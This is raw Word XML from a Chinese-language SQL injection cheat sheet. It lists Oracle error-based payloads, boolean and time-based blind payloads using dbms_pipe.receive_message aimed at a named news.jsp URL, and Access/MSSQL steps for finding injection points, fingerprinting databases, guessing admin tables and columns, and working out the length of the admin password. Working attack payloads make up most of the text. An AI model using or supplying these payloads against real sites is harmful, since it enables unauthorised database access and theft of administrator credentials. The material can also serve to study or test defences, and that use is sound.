        <w:t>and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1973C5BD" w14:textId="47F24135" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:r>
        <w:t>and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC7488" w14:textId="1A3BD397" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D447BB3" wp14:editId="2384018A">
            <wp:extent cx="5274310" cy="11112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1423" w14:textId="7FAFBEF9" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:r>
        <w:t>and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E5E01" w14:textId="77777777" w:rsidR="006E7014" w:rsidRDefault="006E7014" w:rsidP="00173CA1"/>
    <w:p w14:paraId="4F4B29C0" w14:textId="37A91678" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:r>
        <w:t>and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCFC5B8" w14:textId="187530F2" w:rsidR="006E7014" w:rsidRDefault="006E7014" w:rsidP="00173CA1"/>
    <w:p w14:paraId="62E3673D" w14:textId="3257799D" w:rsidR="006E7014" w:rsidRDefault="006E7014" w:rsidP="006E7014">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>布尔注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E81C5" w14:textId="77777777" w:rsidR="006E7014" w:rsidRPr="006E7014" w:rsidRDefault="006E7014" w:rsidP="006E7014">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7014">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CF2E2E"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95D01C" w14:textId="39CC6CD4" w:rsidR="006E7014" w:rsidRDefault="006E7014" w:rsidP="00173CA1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F09C55" wp14:editId="61CE136F">
            <wp:extent cx="4086225" cy="20764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E33E" w14:textId="08534A15" w:rsidR="006E7014" w:rsidRDefault="006E7014" w:rsidP="007D0F2D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FE36C" w14:textId="61748B76" w:rsidR="0043725F" w:rsidRDefault="0043725F" w:rsidP="006F322C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何判断？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39256E30" w14:textId="71AFAE0F" w:rsidR="006F322C" w:rsidRDefault="006F322C" w:rsidP="006F322C">
      <w:r>
        <w:t>http://www.jsporcle.com/news.jsp?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DC225" w14:textId="1919116A" w:rsidR="006F322C" w:rsidRDefault="006F322C" w:rsidP="006F322C">
      <w:r>
        <w:t>http://www.jsporcle.com/news.jsp?id=1 and 1=dbms_pipe.receive_message('RDS', 10)—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178844C7" w14:textId="03FFD80C" w:rsidR="006F322C" w:rsidRDefault="006F322C" w:rsidP="006F322C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果时间延迟，既存在时间注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090FF212" w14:textId="69021659" w:rsidR="006F322C" w:rsidRDefault="006F322C" w:rsidP="006F322C"/>
    <w:p w14:paraId="10203B10" w14:textId="3F86896A" w:rsidR="00EE77E5" w:rsidRDefault="00EE77E5" w:rsidP="006F322C"/>
    <w:p w14:paraId="2348651C" w14:textId="77777777" w:rsidR="00EE77E5" w:rsidRPr="00EE77E5" w:rsidRDefault="00EE77E5" w:rsidP="00EE77E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE77E5">
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27526E9E" w14:textId="3C276606" w:rsidR="00EE77E5" w:rsidRPr="00EE77E5" w:rsidRDefault="00EE77E5" w:rsidP="00EE77E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE77E5">
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D061EF" w14:textId="0C8C90BE" w:rsidR="00EE77E5" w:rsidRDefault="00EE77E5" w:rsidP="00EE77E5"/>
    <w:p w14:paraId="079973BD" w14:textId="77777777" w:rsidR="00EE77E5" w:rsidRPr="00EE77E5" w:rsidRDefault="00EE77E5" w:rsidP="00EE77E5"/>
    <w:p w14:paraId="6B307BDC" w14:textId="46822978" w:rsidR="007D0F2D" w:rsidRPr="007D0F2D" w:rsidRDefault="004A1BB7" w:rsidP="007D0F2D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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nd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kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D" w:rsidRPr="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>select decode(substr(user,1,1),'A',DBMS_PIPE.RECEIVE_MESSAGE('a',5) ,0) from dual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D3203" w14:textId="6FD16D1D" w:rsidR="007D0F2D" w:rsidRDefault="007D0F2D" w:rsidP="007D0F2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7D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>即user的第一位是"A"时，延时5秒执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3AE48" w14:textId="138B8FD4" w:rsidR="007D0F2D" w:rsidRPr="007D0F2D" w:rsidRDefault="004A1BB7" w:rsidP="007D0F2D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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nd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kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D" w:rsidRPr="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>select decode(substr(user,</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D" w:rsidRPr="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,1),'</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007D0F2D" w:rsidRPr="007D0F2D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>',DBMS_PIPE.RECEIVE_MESSAGE('a',5) ,0) from dual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053D6EA" w14:textId="7B140DE5" w:rsidR="007D0F2D" w:rsidRPr="007D0F2D" w:rsidRDefault="007D0F2D" w:rsidP="007D0F2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5"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>第二位是D时，延时5秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37D75B" w14:textId="77777777" w:rsidR="007D0F2D" w:rsidRPr="007D0F2D" w:rsidRDefault="007D0F2D" w:rsidP="007D0F2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EE8693" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD9502" w14:textId="00F956C3" w:rsid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access注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78822E5C" w14:textId="6149AD7A" w:rsidR="00336BC5" w:rsidRDefault="00336BC5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BC5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Access数据库中没有注释符号.因此  /**/   、 --   和   #   都没法使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B548ED1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F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在MSSQL中，参数和union之间的位置，常见的可填充的方式有如下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7C8E3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F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.空白字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE26198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F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6AF61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142E7B1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F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.注释符号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF47C5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311B92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F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mssql也可以使用注释符号/**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62910C9E" w14:textId="77777777" w:rsidR="001C2F72" w:rsidRPr="001C2F72" w:rsidRDefault="001C2F72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88892EB" w14:textId="77777777" w:rsidR="00336BC5" w:rsidRDefault="00336BC5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03A653D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注入点：‘ ，and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号，报错有注入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AA422" w14:textId="77777777" w:rsid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判断数据库类型：and exists(select * from msysobjects)&gt;0  存在说明是access数据库 ,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987976C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 and exists(select * from sysobjects)&gt;0 存在说明是sql server数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8F9CD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数据库中的表：and exists(select * from admin) 返回成功说明存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76241924" w14:textId="6C7C5011" w:rsid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access的数据库中的表：</w:t>
      </w:r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admin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msysobjects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user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username</w:t>
      </w:r>
      <w:r w:rsidRPr="009B36FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B92472" w:rsidRPr="00B92472">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49A00C" w14:textId="5C622809" w:rsidR="00B92472" w:rsidRDefault="00B92472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列：unam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upass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6C8E5" w14:textId="6575DB0C" w:rsidR="00D97F5F" w:rsidRDefault="00D97F5F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A299673" w14:textId="77777777" w:rsidR="00D97F5F" w:rsidRPr="00D97F5F" w:rsidRDefault="00D97F5F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7F5F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>常见的表有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DA4C7" w14:textId="1F74C662" w:rsidR="00D97F5F" w:rsidRDefault="00D97F5F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admin admins admin_user admin_usr admin_msg admin_login user username manager msg_user msg_login useradmin </w:t>
      </w:r>
      <w:r w:rsidR="00230607">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> product、news、usr、</w:t>
      </w:r>
      <w:r w:rsidR="00394403" w:rsidRPr="00394403">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="0039440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F6706B" w:rsidRPr="00F6706B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>article</w:t>
      </w:r>
      <w:r w:rsidR="00F6706B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394403" w:rsidRPr="00394403">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r w:rsidR="0039440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1F3D17">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0775E9" w14:textId="77777777" w:rsidR="00787774" w:rsidRDefault="00787774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DEB5905" w14:textId="2DA877C4" w:rsidR="00787774" w:rsidRDefault="00787774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dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name、admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31381582" w14:textId="77777777" w:rsidR="00787774" w:rsidRPr="00787774" w:rsidRDefault="00787774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701E9D7" w14:textId="77777777" w:rsidR="00787774" w:rsidRPr="00D97F5F" w:rsidRDefault="00787774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2FD21B2" w14:textId="77777777" w:rsidR="00D97F5F" w:rsidRPr="00D97F5F" w:rsidRDefault="00D97F5F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7F5F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>常见的列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64026F0C" w14:textId="4033CA66" w:rsidR="00D97F5F" w:rsidRPr="00D97F5F" w:rsidRDefault="00D97F5F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admin admin_user username password passwd pass pwd users usr user_login user_name login_name </w:t>
      </w:r>
      <w:r w:rsidR="00F7344D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D97F5F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75613DBD" w14:textId="77777777" w:rsidR="00D97F5F" w:rsidRPr="00D97F5F" w:rsidRDefault="00D97F5F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E57AF4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数据库中表内的字段名：and exists(select username from admin) 返回成功说明存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAACCAA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字段长度：order by N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A706C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报错：and 1=2 union select 1,2,....,N from admin(联合查询)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37B0D5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账户密码长度：and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987ADCD" w14:textId="0DB335D4" w:rsid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and (select len(password) from admin)=5 猜解管理密码长度是5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24B66C" w14:textId="2E770DC0" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF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857414A" w14:textId="26289EED" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF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582A00F7" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>盲注Access数据库 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73EBA8" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Access数据库特有的表是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t xml:space="preserve">msysobjects  </w:t>
      </w:r>
      <w:r>
        <w:t>，所以可以用它来判断是否是Access数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20246366" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>exists(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> msysobjects)  #如果这条语句正确，说明是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0611F4" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Access没有数据库的概念，所有的表都是在同一个数据库下。所以，我们不用去判断当前的数据库名，并且access数据库中也不存在 database() 函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB8593" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>对于判断存在哪些表，只能用以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来猜测是否存在某某表。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64701A43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判断存在sql注入后，判断是否存在admin表，如果存在，正常查询，如果不存在，报语法错误。然后通过枚举表名爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC6F95" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>and exists(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141688A" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>猜测字段也是一样，只能通过枚举来猜测 </w:t>
      </w:r>
    </w:p>
